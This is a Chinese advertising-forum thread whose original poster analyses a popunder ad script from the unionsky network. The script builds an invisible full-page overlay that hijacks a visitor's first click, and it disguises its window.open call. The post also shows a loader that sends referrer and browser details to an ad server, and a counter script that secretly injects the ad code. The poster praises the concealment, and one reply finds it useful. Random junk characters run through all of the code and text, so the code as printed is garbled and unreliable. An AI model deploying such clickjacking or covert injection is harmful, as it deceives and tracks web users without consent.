  375.                         if (_i && divs[i] != a && _i == 2147483647) {
    7 Z# K1 {" Z# s6 U0 }
  376.                             divs[i].style.zIndex = _i - 1 & v7 j( V9 U% r, l9 y
  377.                         }
    - x  _9 ?" d7 i- n) X% R' R! u
  378.                     } 0 n# E  p( j1 O" Z% k5 a0 ?
  379.                     a.style.zIndex = '2147483647'
    # C4 E* `* T7 {9 P# L
  380.                 } catch(e) {} ' V# Z& z& w2 M  ?# P. B# K" B
  381.             }
    / m, d  y" `1 h
  382.         },
    7 Y& S5 }8 G$ o; ]/ a3 j  C' a
  383.         120);
    . P3 {1 ?; w# b" M" z) G- C0 k. v
  384.         a.onclick = function(e) {
    " O5 V% M' J  w% j' f; V9 d" t2 J* Z
  385.             if (document.getElementById('__unionsky_push_d_object_box__') != null) { , `! D( f/ S( F! m7 A. f
  386.                 form_div.parentNode.removeChild(form_div) * \. }1 V3 E" M1 ^4 C+ U* H
  387.             }
    $ R* k6 P5 B0 l; I" w
  388.             e = e || window.event; 7 D! y( @! g9 g# }4 |
  389.             e.cancelBubble = true; # u2 a0 u" o( M9 r
  390.             setTimeout(function() { ! F+ M, r6 l# q/ w
  391.                 a.parentNode.removeChild(a) + C" ^$ H) l: y7 F( m# _2 r
  392.             }, & r1 R6 H/ E2 F  ]
  393.             200);
    - B7 H" |% U3 B5 \2 K0 T
  394.             clearInterval(m);
    8 H, X/ j* }! p$ l+ f
  395.             ads++;
    $ F- i8 P! a0 d) b
  396.             p(ckn, ckt, ads)
    , r4 g$ @  ?1 e+ W
  397.         };
    , h6 O! v" r/ R) |8 O
  398.         event(a, 'mouseup',
    . |5 G  Z) n6 q. K. W9 o) @
  399.         function(e) {
    9 T: r3 E0 T' l* T  O( k
  400.             e = e || window.event; $ Z% s. F! k  D7 p+ ~5 W
  401.             e.cancelBubble = true
    * K/ j* f  Y; i: j! q
  402.         })
    ! q: x/ u9 O9 z! c3 N
  403.     } : w, [  a0 t8 }5 p  \; D
  404.     function func(url, param) {
    9 E$ _$ l( t* r
  405.         var f = window[String.fromCharCode(111, 112, 101, 110)];
    + g1 c* I  Q/ l- i  M( M, @) Y! }: c
  406.         var w = f(url, '_blank', 'left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=' + screen.width + ',height=' + screen.height); 1 R0 m" o+ [5 ^7 ?  l: B; B( t/ C
  407.         if (w) {
    7 A2 t* c/ e% U8 b
  408.             ads++;
    # K- H/ J( r- x$ v% P
  409.             p(ckn, ckt, ads) / H) H$ ^/ S4 k3 D9 D
  410.         };
    , c, V, v0 `- f" g+ r
  411.         return w
    : X2 N1 o4 n5 W! N7 ^! J; w" X
  412.     }
    7 [. j. t$ `6 P6 P8 J7 M
  413.     function fstart(url) {
    % h" @) S7 V, n4 Z
  414.         init();
    3 ^5 p$ s+ T9 Q& [" D9 A
  415.         if (_ct >= 0) {
    + Q* l0 k4 I& _9 m& M
  416.             ckn = "YITIAN_NUM"; ; Q/ B- Z% s3 c6 F
  417.             ckt = _ct . M( \, a' r, F0 M9 d. S  ^( u' P
  418.         } else { , C: V( e9 b! p
  419.             ckn = "YITIAN_ALL";
    - H7 u3 |3 ]* l' Z7 z+ E
  420.             ckt = Math.abs(_ct)
    ' K2 h( ^8 B( V! P* y6 Z% G
  421.         } 1 O0 `9 I6 E- S% v  b# f$ k# |
  422.         if (ckt > 0) {
    2 g. s$ \- A1 b# _% X; |
  423.             if (b(ckn)) { $ A. z, Q; I" u6 z2 [* {' z
  424.                 try {
    7 \. k7 Z. t& ]$ y1 `
  425.                     ads = parseFloat(b(ckn))
    / W. O6 Y$ D, e) C
  426.                 } catch(q) {} & i3 d, p: ~$ O8 H+ y7 v- k) R1 \
  427.             } / @: k/ h9 X5 ~+ o  Y( e0 z
  428.         } 6 I2 H% R) H: _7 G0 p
  429.         if ((ads > 0 && ckn == 'YITIAN_ALL') || ads >= ytpp_ads) { 1 Q5 [) c& b# `3 f  E6 q
  430.             return
      f1 }+ A/ k! s+ x/ r9 h
  431.         } else {
    2 e. U9 y* v5 ^# A5 Q, G
  432.             if (_le > 0) { . n# _( y+ P; S% [( z
  433.                 setTimeout(go(url), _le * 1000)
    0 P/ b8 J  w* T' ?" u2 _+ D
  434.             } else {
    & E) m  \- p5 [
  435.                 go(url) 0 s' |% N6 l* m  g
  436.             }
    3 m  v; e- f5 O- f3 |3 B* H
  437.         } & d9 T- w8 F; z& b- |. M. K
  438.     }
    + I; b# I- l* c$ |8 L/ Q2 Q
  439.     function go(url) {
    1 ~2 V- `  Q: `% }" c
  440.         if (_poo == 1) {
    3 p. l( Q: s6 P( X% v( Y
  441.             try {
    ( G* d1 Z8 j5 E- m& _: B& e
  442.                 func(url) - F' r  }, ]  F5 t* D9 L
  443.             } catch(q) {}
    & t  P" Y8 J8 D. d# {! r1 S
  444.         } else if (_pco == 1) { ' Y: S9 K5 p' a9 A
  445.             a_pop(url)
    / x8 A& z* Q! e! K. T/ M9 m9 j
  446.         } else { " H% F$ B, j/ y4 u$ M9 k
  447.             if (_pd == 1) {
    * @" q/ [( J* k/ }( q, }
  448.                 setTimeout(function() {
    ! y, [7 ?. o4 U) B% s& }# J* q9 a
  449.                     pop(url, {
    3 |5 W- a" m( I4 r) W4 `
  450.                         a: 1, 6 ?& J* V4 z) F, L
  451.                         b: 2 8 _- d/ v, W+ F4 Z% P/ c# S
  452.                     }) $ @& t! A7 _) \" W% S' f( B
  453.                 }, $ J7 h$ X, m: h) s) R: Q: s
  454.                 300)
    0 o+ ]6 i8 r# S) M/ H6 j# u
  455.             } / F) i/ j3 @. J0 Q; D" C7 W
  456.             if (_pd2 > Math.random()) { 0 t7 e5 u$ c1 i8 C0 q' l% M% y/ j
  457.                 setTimeout(function() {
    ! j- S% x9 |+ N
  458.                     pop(url, {
    5 V% I* f+ ?+ O4 X; F+ M. a9 e* s, z
  459.                         a: 1, , \  w. m" G, C8 `! V
  460.                         b: 2
    7 p* X2 A0 b) e) v
  461.                     }) 3 Q6 O( o& ^# c9 l4 Y: n
  462.                 }, , b: H/ m8 l* r! z
  463.                 300) + d- q" d! x% ?5 o% n' r+ N
  464.             } % e4 k8 J' f, A% ^
  465.             for (var i = 1; i <= 10; i++) { . \, [" T+ B: L  T5 W
  466.                 var n = i == 1 ? "": i;
    0 _/ r; D7 N* g: ]6 L: Z8 x
  467.                 if (eval("_pt" + n + "b") > Math.random()) { 4 h: s' Z- b$ v
  468.                     setTimeout(function() {
    9 S/ ?- ?) [6 \+ W
  469.                         setTimeout(function() {   J% e3 f7 o# W' u
  470.                             pop(url, { ! M! G) r; v" C- i
  471.                                 a: 1, * j" b; A. s2 k  m+ D
  472.                                 b: 2 7 F  t2 d/ ?/ O
  473.                             }) $ @' x$ G' d3 ]0 @1 h8 z- j. q
  474.                         }, 0 r% f5 t; s( A0 q6 h
  475.                         300) $ V7 ]( x. Y/ k& E! |
  476.                     },
    ! ^6 @0 R( p- p7 j
  477.                     parseInt(eval("_pt" + n + "a")) * 1000)
    ) R8 h0 M) G* U8 Y
  478.                 } ; j. S+ x+ s3 o4 R' g4 g+ q* {8 u
  479.             }
    $ _3 A& B2 m! M* K
  480.             if (_pc2 > Math.random()) { - U& ~/ g! `1 M* k/ h$ \: u8 b
  481.                 a_pop(url) * X  B$ W7 c+ d" a9 x  |) B
  482.             } / E7 F( v; B. ^% Q5 }
  483.             if (_po > Math.random()) {
    7 u9 @* m% m7 u2 c5 @
  484.                 try {
    % R6 y6 a5 V, E
  485.                     func(url)
    ; Z$ z# E2 h) E3 r, ?3 v
  486.                 } catch(q) {} 6 b+ T: X0 L& u0 e2 ]
  487.             } $ [) q# z7 F& L, A5 L
  488.         } , Z" S8 S3 o( h2 y
  489.     }; 6 P4 i$ ~1 Q6 M, J; R
  490.     fstart(aa_url); 5 F/ ~* {/ u1 M" N$ p: k
  491.     event(window, 'beforeunload', * }, Z" L/ `) h
  492.     function() {}) 7 m9 z: g7 |1 I- N
  493. })();
复制代码
通过浏览器抓包
! N" |4 J# W; Y% }: g; D0 p- OURL从这里产生0 a/ d& }$ ^' L7 [, ^. D

) @2 m( k% B* X- a" K) F8 ihttp://play.unionsky.cn/show/?placeid=1418304 l, j3 W& k. p' |% U; i9 A
: j, o+ y1 e6 N8 w/ K) {: E: `# C% K

3 ~' `' J7 \6 }# {
相关帖子
回复

使用道具 举报

126

主题

62

广告币

394

积分

初级会员

Rank: 2

积分
394

社区QQ达人

 楼主| 发表于 2013-12-17 15:04:10 | 显示全部楼层
直接打开看不到什么东西) |3 c' M9 I, U" ~) d
http://www.unionsky.cn/ 是属于这个广告联盟的7 o1 `; n: f0 K6 _4 \( G* L' r
我们直接分析抓包的内容/ o, p  _6 N7 c( i5 L' r. d
var ytpp_r = encodeURIComponent(encodeURIComponent(document.referrer));
" o: m' O9 T( q/ V  L8 |ytpp_r = ytpp_r.length > 1000 ? ytpp_r.substring(0, 1000) : ytpp_r; 6 B1 J( }1 w: X3 _" Y, U2 b
var ytpp_u = encodeURIComponent(navigator.userAgent); 7 Q/ b2 i; f  T3 G2 ?* s
var ytpp_s = window.screen.width + "*" + window.screen.height;
, {/ x* w; Q4 L$ C! J9 Y9 a  Gvar ytpp_l = navigator.browserLanguage || navigator.language;   R/ _9 y( X+ ~# T/ p: L
var ytpp_plid = 141830; / r& E9 f6 p* P
var ytpp_w = 0;
$ u' @' I7 I' o3 bvar ytpp_h = 0;
0 R, Z* v. j9 @9 s0 ?2 z) g# R( T5 ~var ytpp_url = "http://www.lxting.com/jmp/?p=f7xNjUO8Y80tB6KZyJ*jzRXjLuoZaOluHDv/IndJK1Z/mc0eKhM2QddlbEorugPwTAd08JIi*oDNYfaUSsF7QNBk3/CB3LW8&r=" + ytpp_r + "&u=" + ytpp_u + "&s=" + ytpp_s + "&l=" + ytpp_l + "&n=" + Math.random(); % r( n& [# V/ g4 i2 u+ Y
var ytpp_ads = 14; ( B2 `- v! `% L+ g2 t9 `7 X
var ytpp_sti = 'CT:-3D:1C:1C2:1T:60,1T2:100,1;'; ; K* L+ s& S" l' D- f
document.write("<script language='javascript' type='text/javascript' src='http://www.lxting.com/pp/?p=f7xNjUO8Y81LybptxG2Vq//rYbtxQcP5GVnJOL07Ka8=&r=" + ytpp_r + "&u=" + ytpp_u + "&s=" + ytpp_s + "&l=" + ytpp_l + "&n=" + Math.random() + "'></script>"); . j, |& l# Q% l! m
document.write("<script language='javascript' type='text/javascript' src='http://www.lxting.com/script/popup/v1_min.js'></script>");

* W5 o. b5 X3 B, w7 a: V7 h那么这个http://play.unionsky.cn/show/?placeid=141830又是从哪里被引用进去呢。
5 I9 H7 S0 W4 t" v6 J7 ]. Q) ^0 F继续分析 发现这里
" g0 ]5 e4 g: ~, q7 ]
7 D0 x# q( ?1 p) }, `& D# ^http://txsite.21tx.com/count/count.js
' s4 `( h. V( ]3 a4 V4 \7 q5 ]% ^9 U) M, p; b4 h* g+ Q. s
txcount_uid = 1; + B, r! t7 Z4 J/ }- b5 b+ |' J: P4 v
txcount_uh = 0; # Y* m- }) m* R) M5 a8 W
txcount_uw = 0; 8 c, z# r9 a; X, c; g2 Q8 ~1 `
txcount_uah = 0;
7 \/ I1 A7 X" y; `5 ~% Z8 ~txcount_uaw = 0;   @8 x- F) f% T
txcount_ucd = 0; , a% W8 k3 p9 R' D) w5 f
   
3 X. s) V' I7 Z; {1 _: \2 G1 ~/ ^if (window.screen) { : n/ C2 \0 g: e2 r: j. s9 W- z+ o/ S
  txcount_uh = window.screen.height; , O7 c/ {& w8 ]! D4 a6 F4 I' T. g
  txcount_uw = window.screen.width;   m. T8 K  W6 W9 Z. L( R9 F
  txcount_uah = window.screen.availHeight;
9 ^( V8 S# ^- Z2 B+ \! G  txcount_uaw = window.screen.availWidth;   l: B: u( ~- y* x6 L9 x
  txcount_ucd = window.screen.colorDepth; 1 _& [) b+ |( i4 _- Y+ @4 J
} 3 b: i4 j( {/ ?5 e" h
   
7 o: f* q2 M( z) d3 T   
" ]- K8 r* o9 W- y& N( }var url = "http://txsite.21tx.com/count/count.aspx"; " [& s" H+ W5 e& b1 z, j/ y
url = url + "?u="+ txcount_uid;
3 o' r) X0 g0 K( d* m9 X8 \* D) o//url = url + "&f=" + txcount_f; / O: Q" T. {" T7 l- t7 D
url = url + "&k=" + txsite_pagekey; ! ^3 F* d/ t5 R) y( t4 x" o
//url = url + "&t=" + txcount_t; 8 d/ z$ ?7 @& U* p
url = url + "&l=" + escape(document.location);
: n: Q/ Y& v- b5 @url = url + "&r=" + escape(document.referrer);
' J! k5 t4 {9 t4 B$ T3 _url = url + "&uh=" + txcount_uh; % V! h3 o+ F  z! U: `
url = url + "&uw=" + txcount_uw;
& g: a0 O( E( r* n- I2 D* x# burl = url + "&uah=" + txcount_uah; 5 i# x- J- l/ e. U- a+ W8 J: p
url = url + "&uaw=" + txcount_uaw; 6 u' R* n1 Y, ]+ T0 m& z
url = url + "&ucd=" + txcount_ucd; . s0 f# `) L3 I; f$ B1 M6 b- N
   ; D) Q( x& L6 _* _' w; w. g4 v
   
7 `' U( d0 Y9 @# B! D6 p* R6 z8 b8 Udocument.write("<script src=" + url + "><\/script>");
1 b: |. ^( h0 l) K, F* o, r# E/ r//document.write('<script src="http://s4.cnzz.com/stat.php?id=4820460&web_id=4820460" language="JavaScript" charset="gb2312"><\/script>'); 5 \& z8 \$ X  Q
   
. _0 f2 W# y' I6 Q6 P$ |  Xdocument.write('<script src="http://s127.cnzz.com/stat.php?id=1474936&web_id=1474936" language="JavaScript" charset="gb2312"><\/script>');
5 {$ W7 ]4 K9 k5 T   
+ J8 n+ ?9 m, L   , X; F2 c1 K( n* z; V5 i
document.write("<script language='javascript' src='http://play.unionsky.cn/show/?placeid=141830'><\/script>");
1 o; [0 z2 P; V9 h  b/ z
/ P2 |2 [# _# G$ Z
一切昭然天下了。8 |6 S/ k7 W  U/ j) C
代码产生的直接效果如下3 }5 d: K5 V  p+ j) L: V
  F! d9 @  J- ^) y2 h  Y
<a  target="_blank" style="position: absolute; z-index: 2147483647; display: block; top: 0px; left: 0px; cursor: default; opacity: 0;"><div style="background-color: rgb(255, 255, 255); width: 1903px; height: 650px;"></div></a>
$ B# Z& F# @! q5 h& X6 [; Q9 P
6 ~' o. D, e1 H0 c0 W+ H! \很隐秘的一段好代码8 A* X& f1 t. ]6 `8 C) `& q
回复 支持 反对

使用道具 举报

0

主题

488

广告币

1280

积分

高级会员

Rank: 4

积分
1280
发表于 2013-12-17 15:31:30 | 显示全部楼层
标记一下 好象看不懂还
回复 支持 反对

使用道具 举报

31

主题

266

广告币

801

积分

中级会员

Rank: 3Rank: 3

积分
801
发表于 2013-12-17 16:34:22 | 显示全部楼层
不清楚国内,莫非做taobao不可以直接用弹窗吗?
回复 支持 反对

使用道具 举报

4

主题

1333

广告币

1390

积分

高级会员

Rank: 4

积分
1390
发表于 2013-12-17 18:49:06 | 显示全部楼层
没用 360 搜狗 直接就拦截了,chrome可以弹出来
回复 支持 反对

使用道具 举报

54

主题

9

广告币

6010

积分

禁止访问

积分
6010
发表于 2013-12-17 19:34:38 | 显示全部楼层
adblock 完美屏蔽
回复 支持 反对

使用道具 举报

0

主题

91

广告币

97

积分

初级会员

Rank: 2

积分
97

社区QQ达人

发表于 2013-12-17 23:34:52 | 显示全部楼层
没研究全,期待跟多解析。
过往.
回复 支持 反对

使用道具 举报

6

主题

682

广告币

1090

积分

中级会员

Rank: 3Rank: 3

积分
1090

社区QQ达人

发表于 2013-12-18 00:52:13 | 显示全部楼层
代码看不懂,不过觉得挺好用的……自动弹窗
回复 支持 反对

使用道具 举报

52

主题

456

广告币

842

积分

中级会员

Rank: 3Rank: 3

积分
842
发表于 2013-12-18 01:24:03 | 显示全部楼层
没懂
% j7 b* g4 R# q9 b! O9 X' E5 L3 m' O" @4 S+ R
1,首次访问有个弹窗,但是被chrome给拦截了- v1 t+ {% m1 d  h) l( U; p

! y6 W1 \4 O8 F9 {2,劫持了第一次点击
7 ~+ |' P; J' }' a* i) y
& X; o2 i4 s" |' K& H8 ]8 y3,CS了一下unionsky" F2 r4 i) i( Y  h3 b. X0 P
+ ]  N7 y4 A. D* X
然后?
回复 支持 反对

使用道具 举报

126

主题

62

广告币

394

积分

初级会员

Rank: 2

积分
394

社区QQ达人

 楼主| 发表于 2013-12-18 03:49:31 | 显示全部楼层
cissss 发表于 2013-12-18 01:24 ( u( A) A8 P. Z3 Y
没懂
+ t5 i: K' l& Q7 W) g# A
* S& i% u/ f& V6 S4 f1,首次访问有个弹窗,但是被chrome给拦截了
9 I3 `* S- `7 }4 Q  t
懂的人一看就懂 不懂的人怎么看就不懂
回复 支持 反对

使用道具 举报

4

主题

440

广告币

718

积分

中级会员

Rank: 3Rank: 3

积分
718
发表于 2013-12-18 06:34:13 | 显示全部楼层
这个CJ怎么搞的这么复杂...
回复 支持 反对

使用道具 举报

52

主题

456

广告币

842

积分

中级会员

Rank: 3Rank: 3

积分
842
发表于 2013-12-18 17:31:57 | 显示全部楼层
小狠 发表于 2013-12-18 03:49   C" ]- H8 O& J: g( j
懂的人一看就懂 不懂的人怎么看就不懂

/ i& w: W- p6 d) h+ i+ h+ W+ P2 ^我确实不懂你发这贴的意思。 可以理解为装逼么?
回复 支持 反对

使用道具 举报

0

主题

386

广告币

341

积分

初级会员

Rank: 2

积分
341

社区QQ达人

发表于 2014-3-14 13:10:39 | 显示全部楼层
不就是个弹窗代码吗?
回复 支持 反对

使用道具 举报

3

主题

88

广告币

113

积分

初级会员

Rank: 2

积分
113

社区QQ达人

发表于 2014-3-14 23:11:34 | 显示全部楼层
我表示看不懂
回复 支持 反对

使用道具 举报

4

主题

1

广告币

135

积分

初级会员

Rank: 2

积分
135

社区QQ达人

QQ
发表于 2014-3-15 12:03:35 | 显示全部楼层
占位,慢慢领会啥意思
http://faaad.com
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关于我们|联系我们|DMCA|广告服务|小黑屋|手机版|Archiver|Github|网站地图|AdvertCN

GMT+8, 2026-4-7 04:12 , Processed in 0.057729 second(s), 13 queries , Gzip On, MemCache On.

Copyright © 2001-2023, AdvertCN

Proudly Operating in Hong Kong.

快速回复 返回顶部 返回列表